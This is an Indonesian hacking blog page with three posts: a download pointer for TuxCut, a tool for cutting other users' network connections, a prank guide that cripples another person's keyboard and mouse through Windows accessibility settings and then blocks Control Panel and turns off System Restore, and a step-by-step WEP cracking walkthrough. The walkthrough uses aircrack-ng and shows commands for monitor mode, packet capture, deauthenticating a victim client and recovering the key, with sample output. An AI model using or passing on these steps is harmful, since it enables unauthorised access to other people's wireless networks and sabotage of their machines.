Powered By Blogger
Tampilkan postingan dengan label hacking or cheating. Tampilkan semua postingan
Tampilkan postingan dengan label hacking or cheating. Tampilkan semua postingan

Sabtu, 30 Oktober 2010

Mengamankan / Memutus koneksi Dengan Tux Cut

Tux Cut,Merupakan salah satu tools yang ada di linux yang bisa di gunakan untuk mengamankan / memotong koneksi atau bahkan menggani MAC addres.
Saya akan berikan tutorial dari Download sampai Tux cut bisa di gunakan.
Yang pertama anda tentu membutuhkan installer dari tux cut sendiri.untuk mendownload nya, anda dapat menggunjungi web berikut

http://bitbucket.org/a_atalla/tuxcut/downloads/
download sesuai kebutuhan OS anda.di sini saya mengguna ubuntu 9.10,maka dari itu saya menggunakan
TuxCut-3.2_all.deb

Selamat Mencoba yah ^^
Salam Black_id's Zone :)

Hacking Keyboard & Mouse [Iseng]

A.Keyboard Hacking
Memperlambat Control Keyboard Misalkan, seorang user ingin menekan tombol ENTER berulangkali, maka setiap penekanan tombol terdapat jeda waktu sekitar 20 detik. Hal tersebut akan berlaku untuk penekanan tombol yang sama secara berulang. Ingin mencobanya?
Berikut adalah langkah-langkah melakukan Control Keyboard Hacking:
01. Pastikan Anda mempunyai akses ke Control Panel. Jika tidak memiliki akses, dapat menggunakan eksploit yang bisa didapat di http://www.petri.co.il/. Pada website tersebut, Anda dapat mempelajari bagaimana melakukan teknik eksploitasi Windows lainnya.
02. Akses Control Panel -> Accessibility Option -> Keyboard
03. Beri tanda check pada ‘Use FilterKeys’ –> klik Settings
04. Pilih ‘Ignore Repeated Keystrokes’ -> klik Settings
05. Isi ‘Ignore Keystrokes Repeated Faster Than = 2.0 seconds’ Jangan lupa buat semua tanda check pada ‘Notification’
06. Klik ‘OK’ -> ‘OK’ -> ‘Apply’ -> ‘OK’
07. Jreeeeeng! Jreeeeeng! Jreeeeng! Untuk mencobanya, silakan membuka text editor dan mengetikkan tombol yang sama secara berulang-ulang. Anda akan merasakan lambatnya akses pada keyboard.
Melumpuhkan Stag Control Keyboard
01. Akses Control Panel.
02. Akses Control Panel -> Accessibility Option -> Keyboard
03. Beri tanda check pada ‘Use FilterKeys’ –> klik Settings
04. Pilih ‘Ignore Quick Keystrokes and Slow Down The Repeat Rate’ Jangan lupa buat semua tanda check pada ‘Notification’
05. Klik Settings
06. Isi ‘Repeat Delay = 2.0′
07. Isi ‘Repeat Rate = 2.0′
08. Isi ‘Key Must Be Held Down For = 2.0′
09. Jreeeeeng! Jreeeeeng! Jreeeeng! Keyboard menjadi tidak dapat digunakan walaupun keyboard sudah digantikan dengan yang baru.
B.Mouse Hacking
nambahin buat mouse., sbnarx dah lama., tp lumayan buat iseng2., ok lngsung saja., masuk ke control panel trus pilih Mouse., setelah muncul jendela kofigurasix,
1. pada tabulasi Button, check swich primary bla bla bla… pada box Button Configuration,. (gunanya untuk menukar fungsi klik kanan dengan klik kiri)  check juga turn on CLickLock pada box ClickLock (gunax, kita tdak perlu menahan tombol mouse untuk melakukan drag)
2. pada tabulasi Pointer option, geser ke ujung sampai slow pada box Motion,. (gunax untuk mengatur kcepatan gerak dari pinter mouse) kyaknya itu dah cukup., slanjutnya tinggal memblock akses ke Control panel agar tdak d balin lagi, tp klo untuk awam kyaknya mereka bakal gak tau koq., wkwkwkwkw., o iy., jngan lupa matikan System Restorenya., 
slamat beriseng2,.
Salam Black_id's Zone :)

Hack Wifi dengan aircrack-ptw

Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kalau pake “stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0″
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
Step 2 : Start wireless card
$ airmon-ng start wifi0
“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng –channel X –write prefix_for_capture_file interface
misal
$ sudo airodump-ng –channel 3 –write tes ath0
“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”

Selamat Mencoba
Salam Black_id's Zone
:)